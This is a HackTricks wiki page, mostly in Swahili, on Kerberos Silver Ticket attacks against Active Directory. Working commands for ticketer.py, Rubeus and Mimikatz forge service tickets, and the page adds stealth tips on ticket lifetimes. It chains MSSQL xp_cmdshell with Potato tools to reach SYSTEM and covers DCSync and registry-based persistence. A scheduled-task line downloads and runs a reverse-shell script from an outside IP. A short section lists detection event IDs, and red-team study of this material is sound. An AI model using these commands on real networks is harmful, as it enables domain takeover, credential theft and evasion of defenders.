HackTricks
Silver Ticket
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Silver ticket
Shambulio la Silver Ticket linahusisha matumizi mabaya ya service tickets katika mazingira ya Active Directory (AD). Njia hii inategemea kupata NTLM hash ya service account, kama computer account, ili kuforge Ticket Granting Service (TGS) ticket. Kwa ticket hii iliyoforgwa, mshambulizi anaweza kufikia huduma maalumu kwenye mtandao, kuiga mtumiaji yeyote, kwa kawaida akilenga vibali vya usimamizi. Inasisitizwa kwamba kutumia AES keys katika kutengeneza tickets ni salama zaidi na ngumu kugunduliwa.
Warning
Silver Tickets ni ngumu kugundua kuliko Golden Tickets kwa sababu zinahitaji tu hash of the service account, si krbtgt account. Hata hivyo, zina mipaka kwa huduma maalumu wanayolenga. Kwa mfano, kwa kuiba tu nywila ya account, au ikiwa unapata account’s password with a SPN, unaweza kutumia nywila hiyo kutengeneza Silver Ticket kuiga mtumiaji yeyote kwa huduma hiyo.
Modern Kerberos changes (AES-only domains)
- Windows updates starting 8 Nov 2022 (KB5021131) default service tickets to AES session keys when possible and are phasing out RC4. DCs are expected to ship with RC4 disabled by default by mid‑2026, so relying on NTLM/RC4 hashes for silver tickets increasingly fails with
KRB_AP_ERR_MODIFIED. Always extract AES keys (aes256-cts-hmac-sha1-96/aes128-cts-hmac-sha1-96) for the target service account. - If the service account
msDS-SupportedEncryptionTypesis restricted to AES, you must forge with/aes256or-aesKey; RC4 (/rc4or-nthash) will not work even if you hold the NTLM hash. - gMSA/computer accounts rotate every 30 days; dump the current AES key from LSASS, Secretsdump/NTDS, or DCsync before forging.
- OPSEC: default ticket lifetime in tools is often 10 years; set realistic durations (e.g.,
-duration 600dakika) to avoid detection by abnormal lifetimes.
Kwa kutengeneza ticket, zana tofauti zinatumiwa kulingana na mfumo wa uendeshaji:
Kwenye Linux
# Forge with AES instead of RC4 (supports gMSA/machine accounts)
python ticketer.py -aesKey <AES256_HEX> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
-spn <SERVICE_PRINCIPAL_NAME> <USER>
# or read key directly from a keytab (useful when only keytab is obtained)
python ticketer.py -keytab service.keytab -spn <SPN> -domain <DOMAIN> -domain-sid <DOMAIN_SID> <USER>
# shorten validity for stealth
python ticketer.py -aesKey <AES256_HEX> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
-spn cifs/<HOST_FQDN> -duration 480 <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass
Kwenye Windows
# Using Rubeus to request a service ticket and inject (works when you already have a TGT)
# /ldap option is used to get domain data automatically
rubeus.exe asktgs /user:<USER> [/aes256:<HASH> /aes128:<HASH> /rc4:<HASH>] \
/domain:<DOMAIN> /ldap /service:cifs/<TARGET_FQDN> /ptt /nowrap /printcmd
# Forging the ticket directly with Mimikatz (silver ticket => /service + /target)
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> \
/aes256:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET> /ptt"
# RC4 still works only if the DC and service accept RC4
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> \
/rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET> /ptt"
# Inject an already forged kirbi
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>
# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd
Huduma ya CIFS imeangaziwa kama lengo la kawaida la kupata mfumo wa faili wa mwathirika, lakini huduma nyingine kama HOST na RPCSS pia zinaweza kutumika kwa ajili ya kazi na maombi ya WMI.
Mfano: huduma ya MSSQL (MSSQLSvc) + Potato hadi SYSTEM
Ikiwa una NTLM hash (au AES key) ya akaunti ya huduma ya SQL (kwa mfano, sqlsvc) unaweza kutengeneza TGS kwa SPN ya MSSQL na kujifanya mtumiaji yeyote kwa huduma ya SQL. Kutoka hapo, wezesha xp_cmdshell ili kutekeleza amri kama akaunti ya huduma ya SQL. Ikiwa token hiyo ina SeImpersonatePrivilege, chain a Potato ili kuinua hadi SYSTEM.
# Forge a silver ticket for MSSQLSvc (AES example)
python ticketer.py -aesKey <SQLSVC_AES256> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
-spn MSSQLSvc/<host.fqdn>:1433 administrator
export KRB5CCNAME=$PWD/administrator.ccache
# Connect to SQL using Kerberos and run commands via xp_cmdshell
impacket-mssqlclient -k -no-pass <DOMAIN>/administrator@<host.fqdn>:1433 \
-q "EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'whoami'"
- Ikiwa muktadha uliopatikana una SeImpersonatePrivilege (mara nyingi ni kweli kwa service accounts), tumia variant ya Potato ili kupata SYSTEM:
# On the target host (via xp_cmdshell or interactive), run e.g. PrintSpoofer/GodPotato
PrintSpoofer.exe -c "cmd /c whoami"
# or
GodPotato -cmd "cmd /c whoami"
Maelezo zaidi juu ya kutumia vibaya MSSQL na kuwezesha xp_cmdshell:
Potato techniques overview:
RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato
Huduma Zinazopatikana
| Service Type | Service Silver Tickets |
|---|---|
| WMI |
HOST RPCSS |
| PowerShell Remoting |
HOST HTTP Depending on OS also: WSMAN RPCSS |
| WinRM |
HOST HTTP In some occasions you can just ask for: WINRM |
| Scheduled Tasks | HOST |
| Windows File Share, also psexec | CIFS |
| LDAP operations, included DCSync | LDAP |
| Windows Remote Server Administration Tools |
RPCSS LDAP CIFS |
| Golden Tickets | krbtgt |
Kwa kutumia Rubeus unaweza kuomba zote hizi tiketi kwa kutumia parameter:
/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm
Event IDs za Silver tickets
- 4624: Account Logon
- 4634: Account Logoff
- 4672: Admin Logon
- No preceding 4768/4769 on the DC for the same client/service is a common indicator of a forged TGS being presented directly to the service.
- Abnormally long ticket lifetime or unexpected encryption type (RC4 when domain enforces AES) also stand out in 4769/4624 data.
Uendelevu
Ili kuzuia mashine kubadilisha nywila zao kila siku 30 seti HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1 au unaweza kuweka HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge kwa thamani kubwa kuliko 30days kuonyesha kipindi cha mzunguko ambacho nywila ya mashine inapaswa kubadilishwa.
Kutumia vibaya Service tickets
Katika mifano ifuatayo tuchukue kuwa tiketi imepatikana kwa kujifanya kuwa na akaunti ya administrator.
CIFS
Kwa tiketi hii utaweza kufikia folda za C$ na ADMIN$ kupitia SMB (ikiwa zimefunuliwa) na kunakili faili sehemu ya mfumo wa faili wa mbali kwa kufanya kitu kama:
dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp
Pia utaweza kupata shell ndani ya host au kutekeleza amri zozote kwa kutumia psexec:
HOST
Kwa ruhusa hii unaweza kuunda scheduled tasks kwenye remote computers na kutekeleza amri zozote:
#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"
HOST + RPCSS
Kwa tikiti hizi unaweza kutekeleza WMI kwenye mfumo wa mwathiriwa:
#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"
#You can also use wmic
wmic remote.computer.local list full /format:list
Pata habari zaidi kuhusu wmiexec katika ukurasa ufuatao:
HOST + WSMAN (WINRM)
Kwa ufikiaji wa winrm kwenye kompyuta unaweza kuifikia na hata kupata PowerShell:
New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
Tazama ukurasa ufuatao ili ujifunze njia zaidi za kuungana na mwenyeji wa mbali kwa kutumia winrm:
Warning
Kumbuka kwamba winrm lazima iwe hai na ikisikiliza kwenye kompyuta ya mbali ili kuifikia.
LDAP
Kwa ruhusa hii unaweza dump database ya DC ukitumia DCSync:
mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt
Jifunze zaidi kuhusu DCSync katika ukurasa ufuatao:
Marejeo
- https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets
- https://www.tarlogic.com/blog/how-to-attack-kerberos/
- https://techcommunity.microsoft.com/blog/askds/machine-account-password-process/396027
- HTB Sendai – 0xdf: Silver Ticket + Potato path
- KB5021131 Kerberos hardening & RC4 deprecation
- Impacket ticketer.py current options (AES/keytab/duration)
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
Jifunze na fanya mazoezi ya GCP Hacking:Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.